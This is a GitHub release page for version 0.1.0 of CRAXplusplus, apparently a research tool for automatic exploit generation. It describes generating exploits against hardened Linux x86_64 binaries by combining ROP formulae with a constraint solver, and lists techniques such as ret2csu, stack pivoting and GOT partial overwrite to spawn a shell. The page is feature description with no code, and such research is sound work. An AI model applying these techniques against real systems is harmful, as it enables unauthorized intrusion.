Skip to content

Releases: SQLab/CRAXplusplus

0.1.0

06 Feb 10:04
@aesophor aesophor
0.1.0
788ca60
Compare
Choose a tag to compare
0.1.0 Pre-release
Pre-release

What's new in 0.1.0

  • Capable of generating exploits targeting linux x86_64 binaries with ASLR + NX + PIE + Canary.
  • Combines ROP formulae with constraint solver to generate ROP chain
    • Each exploitation technique comes with an ROP formula.
    • An ROP formula is essentially a vector of symbolic expression trees.
    • These symbolic expression trees are fed to the solver for a concrete input.
    • The concrete input (if computable) can be used as the ROP subchain which performs stack pivoting.
  • Built-in Modules:
    • I/O states (originally developed by Balsn CTF Team)
    • Dynamic ROP (incomplete)
  • Built-in Techniques:
    • Ret2csu (it parses the instructions in __libc_csu_init() and generates the corresponding ret2csu ROP subchain)
    • Basic/Advanced stack pivoting (the advanced one requires a call site of read@libc and leave ; ret gadget)
    • GOT partial overwrite - a technique which overwrites GOT['read']'s least significant byte and spawns a shell with syscall gadget.
Assets 2
Loading